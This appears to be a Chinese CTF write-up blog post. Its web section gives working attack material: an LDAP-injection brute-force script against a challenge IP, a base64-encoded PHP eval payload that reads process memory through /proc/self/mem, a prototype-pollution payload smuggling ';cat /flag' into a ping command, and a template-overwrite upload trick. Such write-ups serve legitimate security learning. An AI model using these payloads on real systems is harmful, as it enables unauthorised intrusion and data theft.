总分2108,排行57,还是太水了,记录一下叭
目录
web
签到题:
直接手拼出来,提交后发现不对,base64在解密一下就过了
[萌]odd_upload
题目描述:目录结构与官方项目example相同
打开靶机发现Smarty模板引擎,去官网下载down下来后看了一下目录结构以及文件后缀。
上传文件,抓包改包覆盖index.tpl文件,写入执行的命令,
查看首页就可以得到flag啦
easyinject
打开靶机,构造url报错,发现是ldap注入。根据提示说flag是一位用户的用户名或者邮箱。
直接贴脚本,写的不是很完整,但大概是那个意思,懒得完善了
手动提取一下user,然后一个一个提交了就行
import requests
url = "http://47.106.172.144:2333/?pass=EC77k8RHquAMLKAX&"
username=[]
c = 1
d = 0
dist=['a','b','c','d','e','f','g','h','i','j','k','-','l','m','n','o','p','q','r','.','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','_','@']
def bpuser(payload):
username = []
for i in dist:
payolad = url + payload +"%s*" %i
print(payolad)
str_get = requests.get(url=payolad).text
if '找不到用户' in str_get:
continue
aaa=payload + i
username.append(bpuser(aaa))
return username
aaa = "user=l"
user = bpuser(aaa)
print(user)
hideandseek(复现)
这题不会,是后来大佬给了思路复现的,以下的payload是大佬写的。自己写的没那么好
给了两个提示:
hint1:要怎样才能读到内存里面的flag呢? 注:与PHP版本无关
hint2:linuxの奇妙文件系统
这一题需要先连接linux下/proc下的文件各个代表的含义
值得一提的是,直接读mem文件时读不了的,需要设置好偏移,至于怎么设置偏移,就得去maps文件中查看偏移量。
payload:
?eval=eval(base64_decode("ICAgICAgICAkaGFuZGxlID0gZm9wZW4oIi9wcm9jL3NlbGYvbWFwcyIsICJyIik7CiAgICAgICAgaWYgKCRoYW5kbGUpIHsKICAgICAgICAgICAgd2hpbGUgKCFmZW9mICgkaGFuZGxlKSkgewogICAgICAgICAgICAgICAgJGJ1ZmZlciA9IGZnZXRzKCRoYW5kbGUpOwogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkYnVmZmVyLCAnLycpID09PSBmYWxzZSkgewogICAgICAgICAgICAgICAgICAgIC8vIGVjaG8gJGJ1ZmZlcjsKICAgICAgICAgICAgICAgICAgICAkcGF0dGVybiA9ICIvKFthLWYwLTldezEsfSktKFthLWYwLTldezEsfSkvIjsKICAgICAgICAgICAgICAgICAgICBwcmVnX21hdGNoKCRwYXR0ZXJuLCAkYnVmZmVyLCAkbWF0Y2hlcyk7CiAgICAgICAgICAgICAgICAgICAgdmFyX2R1bXAoJG1hdGNoZXMpOyAgLy/ovpPlh7rljLnphY3nu5PmnpwKICAgICAgICAgICAgICAgICAgICAkc3RhcnQgPSBoZXhkZWMoJG1hdGNoZXNbMV0pOwogICAgICAgICAgICAgICAgICAgICRlbmQgPSBoZXhkZWMoJG1hdGNoZXNbMl0pOwogICAgICAgICAgICAgICAgICAgICRzaXplID0gJGVuZC0kc3RhcnQ7CiAgICAgICAgICAgICAgICAgICAgJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygiL3Byb2Mvc2VsZi9tZW0iLEZBTFNFLE5VTEwsJHN0YXJ0LCRzaXplKTsKICAgICAgICAgICAgICAgICAgICAvLyBmbGFne30KICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAiXG4iOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICAgICBmY2xvc2UgKCRoYW5kbGUpOwogICAgICAgIH0="));
dirtyrce(复现)
此题为复现。因为当时实在没想到原型链污染,这个漏洞点用的还是不熟
题目描述:RCE IT! flag位置 /flag
hint:代码有一个判断非常奇怪 如何利用这个判断呢 注意题目名称
源码:
var express = require('express');
var nodeCmd = require('node-cmd');
var bodyParser = require('body-parser');
const app = express();
var router = express.Router();
const port = 80;
app.use(bodyParser.urlencoded({
extended: true
})).use(bodyParser.json());
function isValidIP(ip) {
var reg = /^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])$/;
return reg.test(ip);
}
app.post("/ping",
function(req, res, next) {
b = req.body.cmd;
if (req.body.ping === undefined) {
res.send('invalid parm');
return;
}
ping = req.body.ping
if (ping.time !== undefined) {
time = Number(ping.time);
if (time > 10 || time < 1) {
res.send('invalid time');
return;
}
if (Object.keys(ping).length != 1 && ping.ip !== undefined && ping.ip != '') {
if (!isValidIP(ping.ip)) {
res.send('invalid ip addr');
return;
}
}
} else {
res.send('need time parm');
return;
}
ip = ((ping.ip !== undefined && ping.ip != '') ? ping.ip: '114.114.114.114');
nodeCmd.run('ping -n ' + time + ' ' + ip, //WINDOWS USE -n
function(err, data, stderr) {
res.send(data);
return;
});
});
app.get('/',
function(req, res, next) {
res.redirect('index');
});
app.get('/index',
function(req, res, next) {
res.send('<title>ping test</title><form action="/ping" method="POST">Ip:<input type="text" name="ping[ip]"" placeholder="default value 114 dns"><br>Times:<input type="text" name="ping[time]" value="1"><input type="submit" value="Ping !"></form> ');
});
app.listen(port);
问题就出在了这个判断中:
全部代码中只有它判断了ip,只要我们绕过了这里就能进制rce利用
故此我们不传入ip,只传入time,就能过掉这里所有的阻碍,至于漏洞利用的点,我们可以利用原型链污染,构造这样的payload:ping[__proto__][ip]=;cat /flag&ping[time]=1
就成功绕过所有的阻碍,成功利用rce
杂项
签到
题目直接给了flag,提交就行了
[萌新]在哪呢
Pdf文档,ctrl+a,ctrl+c,建个txt文件,粘贴,直接往下滑就看到flag了
密码学
[签到]键盘侠
根据给的字母,在键盘上画出来就行了
[萌新]素数
题目要求提交10个1024位的质数,网上搜个脚本,提交了就行
逆向
[签到]signin
用ida打开,shift+f12,就看到flag了